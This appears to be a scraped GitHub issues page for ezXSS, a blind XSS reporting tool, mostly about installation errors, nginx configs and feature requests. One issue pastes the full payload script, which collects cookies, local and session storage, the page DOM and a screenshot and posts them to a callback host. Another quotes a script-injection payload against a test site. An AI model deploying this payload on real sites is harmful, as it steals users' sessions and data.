ssl / ezxss Goto Github PK

Hello,

I have followed your install instructions, added database details but when i visit my site i get redirected to /manage/install however it's not existing.

Am i missing some steps? What should i do i use endora.cz hosting.

Hi @ssl

I tried to install the latest release in /ezxss/ directory, updated the db file, and tried to navigate /manage/install for installation, it gets redirected to /manage/login/ not /ezxss/manage/login/ without the installation process.

Hello again! We upgraded from PHP 7.2 to 7.4 and we're seeing these errors in our Nginx error logs:

2020/05/18 00:17:41 [error] 16821#16821: *57 FastCGI sent in stderr: "PHP message: PHP Notice: Trying to access array offset on value of type bool in /var/www/html/src/Component.php on line 42" while reading response header from upstream, client: x.x.x.x, server: my.server, request: "GET /manage/login HTTP/2.0", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "my.server", referrer: "https://my.server/manage/reports"

2020/05/18 00:17:46 [error] 16821#16821: *57 FastCGI sent in stderr: "PHP message: PHP Notice: Trying to access array offset on value of type bool in /var/www/html/src/User.php on line 64" while reading response header from upstream, client: x.x.x.x, server: my.server, request: "POST /manage/request HTTP/2.0", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "my.server", referrer: "https://my.server/manage/login"

2020/05/18 01:39:22 [error] 16821#16821: *112 FastCGI sent in stderr: "PHP message: PHP Notice: Trying to access array offset on value of type bool in /var/www/html/src/Component.php on line 274" while reading response header from upstream, client: x.x.x.x, server: my.server, request: "GET /manage/settings HTTP/2.0", upstream: "fastcgi://unix:/run/php/php7.4-fpm.sock:", host: "my.server", referrer: "https://my.server/manage/login"

Looking back through the logs before the 7.4 upgrade, I do not see these messages.

Still posible how interested in postbackurl and cookie..

Hi, when I search for a domain so I can mass remove it via the dashbaord, I get a URL formatted like https://localhost/manage/reports?search=example.com and 50 search results (would really like to see a button to display all search results) on the page. I select all, tap delete and instead of seeing more search results, there is nothing shown on the page. If I tap next, I am taken to a peculiar URL: https://localhost/manage/reports?page=1example.com which just shows me page 1 all of the reports received.

Thank you for providing this amazing software to the community.

After I reached 7000 reports (ID is over 9700 though only have 7443 live reports) in my ezXSS install, I began to notice that loading https://domain/manage/dashboard after logging in was taking an inordinate amount of time to load (38 seconds to be exact). I'm curious if there are some optimizations that could be made here because when I instead load https://domain/manage/payload immediately upon logging in, the page loads instantly, however when I navigate back to https://domain/manage/dashboard, it takes longer than expected to load (38 seconds).

PHP 7.2.24-0ubuntu0.19.04.2
mysql-server 5.7.28-0ubuntu0.19.04.2

Nothing really stands out when I run mysqltuner however CPU usage appears to 100% of a single CPU core whilst this endpoint is loading. Thank you for investigating this issue.

Good morning and thank you for this great software. Would it be possible to add the ability to share, delete or archive the report from inside the actual report and not just from the screen that shows the entire list of reports?

First of all i would like to say thank you to create this project. My issues is about the custom payload, when i create my custom payload it said my payload has been saved but i don't know where i can show my store custom payload. one more thing is i don't know how to use this project....i hope u don't mind my english.

directory "manage" not exist. How i can install it? i must start from version 2.3 ?

A recent change has broken the way the drop down options to delete a single report operate. If I navigate to page 3 or 5 or 20, and delete a single report using the drop down option instead of the check boxes, it returns me to page 0 instead of staying on the current page so I can continue looking through reports..

The following was brought up by @geeknik.

If folks want to use .env, they'll need to properly configure their server in order to ensure the .env file doesn't get inadvertently exposed to the world. Here is a configuration example for nginx which denies access to locations starting with . other than the .well-known directory:

location ~ /\.(?!well-known).* {
    deny all;
    access_log off;
    log_not_found off;
}

Originally posted by @geeknik in #54 (comment)

no /manage/install

when i save the timezone, it's always return false even given a correct timezone like "Asia/Shanghai"

Hi, when will version 4.0 be updated, and will there be multiple users?
@ssl

Hello,

I tried to set up this tool, apache is up , I added the DB informationin the file /src/Database but I cannot access the /manage/install since it does not exist. Can you please tell me if I miss a step?

Thank you

Thank you for creating this great software, it is very useful to us. Could you make it easier to delete more than 1 report at a time?

PHP Fatal error: Uncaught Error: Call to a member function prepare() on null in /var/www/html/ezxss/src/Database.php:43\nStack trace:\n#0 /var/www/html/ezxss/src/Database.php(95): Database->fetch('SELECT value FR...', Array)\n#1 /var/www/html/ezxss/src/Route.php(19): Database->fetchSetting('timezone')\n#2 /var/www/html/ezxss/index.php(35): Route->__construct()\n#3 {main}\n thrown in /var/www/html/ezxss/src/Database.php on line 43

Hello @ssl

Here is the error (manage/install)

Call to a member function prepare() on null in /var/www/html/manage/src/Database.php:23

full error message

[Mon Mar 18 12:27:08.553386 2019] [php7:error] [pid 2083] [client 194.34.132.57:57567] PHP Fatal error:  Uncaught Error: Call to a member function prepare() on null in /var/www/html/manage/src/Database.php:23\nStack trace:\n#0 /var/www/html/manage/src/Component.php(17): Database->fetch('SELECT * FROM s...', Array)\n#1 /var/www/html/manage/src/Component.php(13): Component->settings('timezone')\n#2 /var/www/html/manage/src/Route.php(7): Component->__construct()\n#3 /var/www/html/manage/src/Bootstrap.php(12): Route->__construct()\n#4 /var/www/html/manage/index.php(9): require('/var/www/html/m...')\n#5 {main}\n  thrown in /var/www/html/manage/src/Database.php on line 23

Hi, something seems to be wrong with the DB I created.
I created an empty db and filled the values in src/Database.php
When accessing manage/install I got 500
My first issue was because of the timezone:
[Mon Apr 13 03:28:15.271362 2020] [php7:error] [pid 16860] [client xx.xxx.xxx.xx:xxxxx] PHP Fatal error: Uncaught Error: Call to a member function prepare() on null in /var/www/mydomain.com/src/Database.php:43\nStack trace:\n#0 /var/www/mydomain.com/src/Database.php(95): Database->fetch('SELECT value FR...', Array)\n#1 /var/www/mydomain.com/src/Route.php(19): Database->fetchSetting('timezone')\n#2 /var/www/mydomain.com/index.php(30): Route-> __construct()\n#3 {main}\n thrown in /var/www/mydomain.com/src/Database.php on line 43
I was able to work around this by changing src/Route.php to

      /**
      if(!empty($this->database->fetchSetting('timezone'))) {
        date_default_timezone_set($this->database->fetchSetting('timezone'));
      } else {
        date_default_timezone_set('Europe/Amsterdam');
      }
      **/
      date_default_timezone_set('Europe/Amsterdam');

Now, I get a second issue which I cannot resolve stating in my error.log:
[Mon Apr 13 13:36:48.158340 2020] [php7:error] [pid 17701] [client xx.xxx.xxx.xx:xxxxx] PHP Fatal error: Uncaught Error: Call to a member function prepare() on null in /var/www/mydomain.com/src/Database.php:83\nStack trace:\n#0 /var/www/mydomain.com/src/Route.php(57): Database->rowCount('SELECT * FROM s...')\n#1 /var/www/mydomain.com/index.php(31): Route->template('install')\n#2 {main}\n thrown in /var/www/mydomain.com/src/Database.php on line 83

Any idea what I am doing wrong with my DB?

Hi,

I have one question and one comment.
Q: email reporting is not working. How can I debug? Is there anything I should set for it to work?

And comment: you may want to add to FAQ/wiki the testing process:

1. Go to https://www.w3schools.com/html/tryit.asp?filename=tryhtml_default
2. Add string after tag:

3. Click "run"
   PS you can use browser's developers tool to debug

Hello! Your program is awesome, but i see you're having only apache support in readme, while I'm using NGINX.

I've made config that works with ezXSS 3.0 for NGINX, and i will be glad if you will add it into your readme so other people wont waste their time if they're having NGINX too :)

server {
listen 80;
listen [::]:80;

root /var/www/html/ezxss;
    client_max_body_size 150m;
# Add index.php to the list if you are using PHP
index index.php index.html index.htm index.nginx-debian.html;

server_name 'YOUR DOMAIN NAME';
add_header 'Access-Control-Allow-Origin' '*';
add_header 'Access-Control-Allow-Methods' 'GET, POST';
add_header 'Access-Control-Allow-Headers' 'origin, x-requested-with, content-type';

autoindex off; 

location /
{
        if ($uri !~ "assets")
        {
                set $rule_0 1$rule_0;
        }

        if ($rule_0 = "1")
        {
                rewrite ^/(.*)$ /index.php;
        }
}

location ~ \.php$ {
	include snippets/fastcgi-php.conf;
	fastcgi_pass unix:/var/run/php/php7.2-fpm.sock;
}	

}

Hi,SSL

I'm trying to install ezXSS with LNMP.

However, I have some troubles when I convert .htaccess to Nginx rewrite rules.

Could you provide nginx rewrite rules, if possible? Or I have to use LAMP environment?

More than thanks.

Currently on line 263 of src/Route.php we see $headers[] = 'From: ezXSS';. which shows the From email is defined as ezXSS. This however is not a valid email syntax and can cause emails to bounce or goto spam in some configurations.

As a fix I suggest we implement the option to define the From email in the settings.

Alternatively we can set this as the same email the user provided earlier as done in c0af956 or set it as ezxss@{domain} as done in 300c553. If the first solution of a user configurable from email is preferred I will let you implement that. Otherwise if one of the alternatives is preferred I can submit a PR with this change.

I just installed ezXSS v3.2 and I am facing issue with payload <script src=//domain.me></script> .

• If I visit https://xss-game.appspot.com/level1/frame?query=test%3Cscript%20src=//domain.me%3E%3C/script%3E I am getting error in Chrome console Failed to load resource: the server responded with a status of 406 () and in Firefox console Loading failed for the <script> with source “https://domain.me/”.

But your provided demo https://xss-game.appspot.com/level1/frame?query=test%3Cscript%20src=//demo.ezxss.com%3E%3C/script%3E works fine https://demo.ezxss.com/manage/report/1b1cc80e3a83bee557fd1b177d838ba8a7eed1ba

Although this payload works for stored xss scenario .

I also cross checked with another user who is using for long time same updated version and I confirm his one is also not working for same scenario .

Hope you will take a look in this issue .

访问XSS后报告无内容

Hello @ssl 👍

• After pointing Database.php entries to my empty msql db.I'm getting following Exception while loading /manage/install , Am i Missing something ?

# tail /var/log/nginx/error.log 
  thrown in /var/www/html/manage/src/Database.php on line 23" while reading response header from upstream, client: 49.206.213.140, server: woot.me, request: "GET / HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.0-fpm.sock:", host: "woot.me"
2018/08/19 01:11:00 [alert] 6493#6493: *20 open socket #11 left in connection 5
2018/08/19 01:11:00 [alert] 6493#6493: aborting
2018/08/19 01:11:48 [error] 6644#6644: *5 FastCGI sent in stderr: "PHP message: PHP Fatal error:  Uncaught Error: Call to a member function prepare() on null in /var/www/html/manage/src/Database.php:23
Stack trace:
#0 /var/www/html/index.php(10): Database->fetch('SELECT * FROM s...')
#1 {main}
  thrown in /var/www/html/manage/src/Database.php on line 23" while reading response header from upstream, client: 49.206.213.140, server: woot.me, request: "GET / HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.0-fpm.sock:", host: "woot.me"
2018/08/19 01:15:15 [notice] 7755#7755: signal process started
2018/08/19 01:17:26 [notice] 7797#7797: signal process started

I think it might be useful to deploy an instance of ezxss where only certain domains are allowed to make requests and all others are dropped, blocked, ignored, etc. Could a whitelist be added so the user could choose between either mode? Thank you.

1. Downloaded last release
2. Unziped it to the root
3. Configured src/Database.php
4. Opening mydomain.com/manage/install 404 NOT Found.

What is wrong, can you please help?

The ability to resize Local Storage, Session Storage, and DOM within a report would improve usability. I have created a PR that does this.

Hello! I would like to suggest to add "Extracted URLs" page under "Reports" section or as a tab in Reports page.

Feature similar to what XSSHunter have now and called "Collected pages". XSS will just extract HTML of additional pages defined by user somewhere in settings and can be like "/home/foo/bar/secret.html" or "/robots.txt".

Great framework with nice UI, still need to tweak font color in some places like reports page :)

Thanks.

Hi,

What is the format that is being used to set a new time zone. I live in United States/Rochester I tired different combo and still no luck. Where does it check to validate the time zone?

The ability to share a finding over email would be an awesome feature. Currently I have my firewall set to block /manage/ for everyone besides me, but I would still like to be able to share findings as needed. Being able to essentially resend the report email but to a user specified address would address this.

I've got ezXSS installed and it's collecting reports and callbacks and everything is working nicely. Except when I put a domain in Settings->Block domains and tap Save, it doesn't actually stop the emails or the reports from being generated. It does save the domains in the list and they persist between sessions, so that is working.

On a related front, the Don't save report or send alert option doesn't seem to be working here either as I've gotten about 40 reports from the same domain.

Anything I can do on my end?

When attempting to set a custom from email on ezxss 3.7 the email is not saved and the field returns blank after refreshing the page.

Hey,

I was installing ezxss on one of my hosting, but there is no installation file. Can anybody send me or tell me from where i can get this file.

Thanks,

As of version 3.6 there is no longer an index.php file, however during this change you forgot to update the .htaccess to reflect this. I have made a new PR that resolves this issue.

Hey ,

While I was trying to see how does it work , I noticed that any new reports generated won't be visible in /manage/reports page , Although I can get the reports with the search option (searching for the domain) But it will be useless if it is working like that.

Thanks

Hi,

I see you have this feature on your to-do list, I would be interested to know your thoughts about this feature for not including it in the initial release? any specific or technical reason, as this is one of an important option to have for displaying the impact of bXSS.

Thanks for maintaining this project.

This just started happening recently and I have no idea how to troubleshoot it because it doesn't happen with every report, or even every other report. The only thing that the 2 URLs share in common is the .co.uk TLD. I see nothing strange in the nginx access or error logs.

我是使用的dnmp部署的，lnmp环境，安装好以后发现访问域名，返回的js中post提交的域名是localhost，请问除了在payload.js中强制修改为当前域名外，还有没有其它办法？

function ez_n(e){return void 0!==e?e:""}function ez_cb(e){var t=new XMLHttpRequest;t.open("POST","https://localhost/callback",!0),t.setRequestHeader("Content-type","text/plain"),t.onreadystatechange=function(){4==t.readyState&&t.status},t.send(JSON.stringify(e))}function ez_hL(){try{ez_rD.uri=ez_n(location.toString())}catch(e){ez_rD.uri=""}try{ez_rD.cookies=ez_n(document.cookie)}catch(e){ez_rD.cookies=""}try{ez_rD.referrer=ez_n(document.referrer)}catch(e){ez_rD.referrer=""}try{ez_rD["user-agent"]=ez_n(navigator.userAgent)}catch(e){ez_rD["user-agent"]=""}try{ez_rD.origin=ez_n(location.origin)}catch(e){ez_rD.origin=""}try{ez_rD.localstorage=window.localStorage;}catch(e){ez_rD.localstorage="";}try{ez_rD.sessionstorage=window.sessionStorage;}catch(e){ez_rD.sessionstorage="";}try{ez_rD.dom=ez_n(document.documentElement.outerHTML)}catch(e){ez_rD.dom=""}try{html2canvas(document.body).then(function(e){ez_rD.screenshot=ez_n(e.toDataURL()),ez_c();});}catch(e){ez_rD.screenshot="",ez_c()}function ez_c(){ez_r(),ez_cb(ez_rD)}}function ez_aE(e,t,n){e.addEventListener?e.addEventListener(t,n,!1):e.attachEvent&&e.attachEvent("on"+t,n)}ez_rD={},"complete"==document.readyState?ez_hL():ez_aE(window,"load",function(){ez_hL()});

I made an ansible role for ezXSS that sets up ezXSS inside a docker container with a corresponding database, so ezXSS can be up and running quickly.

If you'd be interested in adding it to ezXSS, I can clean it up turn it into a pull request.

Lamp environment installation ezXSS, PHP version:7.2.4 Directory and file all set www:www permissions, files can not be accessed, add probe test can be accessed. There is no other environment and plug-in requirements. Parse error: syntax error, unexpected '0' (T_LNUMBER), expecting ',' or ') in /manage/src/User.php on line 197

Thank you very much for the open source project.
I have successfully installed it and tested the 2FA function. The prompt is added successfully, but when I log in again, I still only need password login, no secondary authentication.

Hello and thank you for this most excellent software. An issue that I've tried and failed to troubleshoot on my end is that every once in a while, I'll receive a report via email which doesn't exist in the dashboard and at the top of the email it says:

XSS Report #0
Get a fast view below or view the whole report on https://domain_name/manage/report/0

There is never a Report #0 and there is no rhyme or reason as to when or how often this happens. Even though it doesn't save the report to the DB, it did save a screenshot (this time) and I'm able to view that. Any thoughts?

Hi,
I'm trying to install ezXSS unfortunately I got a direct error 500.

• Debian 10 / Apache2 (with header & rewrite mod) / php7.3 (with php-curl)

My apache2 config :

<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/ezXSS

        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined
        <Directory /var/www/ezXSS>
                Options Indexes FollowSymLinks
                AllowOverride All
                Require all granted
        </Directory>
</VirtualHost>

And when I try a curl :

root@ezXSS:/var/www/ezXSS# curl -v 127.0.0.1/manage/install
* Expire in 0 ms for 6 (transfer 0x559904f25f50)
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Expire in 200 ms for 4 (transfer 0x559904f25f50)
* Connected to 127.0.0.1 (127.0.0.1) port 80 (#0)
> GET /manage/install HTTP/1.1
> Host: 127.0.0.1
> User-Agent: curl/7.64.0
> Accept: */*
>
* HTTP 1.0, assume close after body
< HTTP/1.0 500 Internal Server Error
< Date: Wed, 12 Aug 2020 14:00:42 GMT
< Server: Apache/2.4.38 (Debian)
< Set-Cookie: PHPSESSID=mdco9pjh1gadnp666atv9f3s1v; expires=Wed, 21-Oct-2020 00:40:42 GMT; Max-Age=6000000; path=/; HttpOnly
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Access-Control-Allow-Origin: *
< Access-Control-Allow-Headers: origin, x-requested-with, content-type
< Access-Control-Allow-Methods: GET, POST
< Content-Length: 0
< Connection: close
< Content-Type: text/html; charset=UTF-8
<
* Closing connection 0

Thank's

It would be great if there was an option to select what information do you want to collect from the page.

For example, sometimes the URL (and IP) is enough and you don't want to collect the DOM and cookies (some bounty programs don't want you to do that).

Thanks

First of all thats not just copy files - youre done.

Just pasting files in directory havent helped, i saw 404 on manage/install.

So you have to modify /etc/nginx/sites-available/default and add the rewrite rules in your Host's locations ( 80,443 ) and # the default / location like done below.

add_header 'Access-Control-Allow-Origin' '*';
add_header 'Access-Control-Allow-Methods' 'GET, POST';
add_header 'Access-Control-Allow-Headers' 'origin, x-requested-with, content-type';

    #Re-write Rule
    location /
    {
            rewrite ^/callback/?$ /callback.php last;
    }

    location /manage
    {
            if ($uri !~ "assets")
            {
                    set $rule_0 1$rule_0;
            }

            if ($rule_0 = "1")
            {
                    rewrite ^/(.*)$ /manage/index.php;
            }
    }
    #Rule end
    #location / {
            # First attempt to serve request as file, then
            # as directory, then fall back to displaying a 404.
    #       try_files $uri $uri/ =404;
    #}

Then i saw this : *1 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function curl_init() in /var/www/html/manage/src/Component.php:61

So, we should install php-curl ( that wasnt done on clean system )
sudo apt-get install php-curl

You know how to use the program to get postbck urls from surveys from sponsors.

Hi, I have the Filters setting to "Don't save report or send alert" when a report is already known as seen here:

However, I still get multiple reports in a row with the same URL. Is there something else I can do here to better prevent getting inundated with reports from the same URL? Thank you.